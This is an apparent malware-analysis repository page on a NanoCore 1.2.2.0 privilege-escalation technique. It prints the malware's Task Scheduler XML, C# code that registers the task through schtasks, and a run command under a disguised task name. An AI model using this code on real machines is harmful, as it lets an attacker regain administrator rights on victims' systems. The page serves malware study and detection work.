This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules
This is a privilege escalation TTP extracted from NanoCore 1.2.2.0. It uses task scheduler to escalate privileges. Initially the NanoCore client is executed with admin privileges, and it creates a task in scheduler with admin configuration. Once the task has been added, the NanoCore client can easily regain admin privileges even after reboot by simply executing a Run task command.
NanoCore 1.2.2.0 privilege escalation TTP function has encoded xml file bytes that sets up everything for the task. The malware decode configuation, replaces path of executable with Identifier: EXECUTABLEPATH and arguments if any in the xml configuration file and use it to register the task.
<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n
<Task version=\"1.2\"
xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n
<RegistrationInfo />\r\n
<Triggers />\r\n
<Principals>\r\n
<Principal id=\"Author\">\r\n
<LogonType>InteractiveToken</LogonType>\r\n
<RunLevel>HighestAvailable</RunLevel>\r\n
</Principal>\r\n
</Principals>\r\n
<Settings>\r\n
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n
<AllowHardTerminate>true</AllowHardTerminate>\r\n
<StartWhenAvailable>false</StartWhenAvailable>\r\n
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n
<IdleSettings>\r\n
<StopOnIdleEnd>false</StopOnIdleEnd>\r\n
<RestartOnIdle>false</RestartOnIdle>\r\n
</IdleSettings>\r\n
<AllowStartOnDemand>true</AllowStartOnDemand>\r\n
<Enabled>true</Enabled>\r\n
<Hidden>false</Hidden>\r\n
<RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n
<WakeToRun>false</WakeToRun>\r\n
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n
<Priority>4</Priority>\r\n
</Settings>\r\n
<Actions Context=\"Author\">\r\n
<Exec>\r\n
<Command>\"#EXECUTABLEPATH\"</Command>\r\n
<Arguments>$(Arg0)</Arguments>\r\n
</Exec>\r\n
</Actions>\r\n
</Task>
According to the task configuration, there are no triggers set to execute task automatically. As mentioned above, NanoCore doesn’t use it for achieveing persistence, rather it uses it to elevate privileges. To do that, only a simple command is needed which is to run the task that was registered.
try
{
//creating a temporary task config xml file
string tempFileName = Path.GetTempFileName();
File.WriteAllText(tempFileName, text);
//scheduling task
string task_cmd = string.Format("/create /f /tn \"{0}\" /xml \"{1}\"", task, tempFileName);
ProcessStartInfo startInfo = SetProcessInfo("schtasks.exe", task_cmd);
Process process = Process.Start(startInfo);
bool result = false;
if (process.WaitForExit(duration))
{
result = (process.ExitCode == 0);
}
File.Delete(tempFileName); //delete temporary task configuration file
return result;
}
catch (Exception exception_)
{
Console.WriteLine(exception_ + ":CreateScheduledTask");
}
After the task has sucessfully been registered. We can run it like this:
schtasks.exe /run /tn "NTFS Manager" //eg: NTFS Manager is the name of registered task
Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries
Artifacts and code of this repository is intended for Educational purposes only!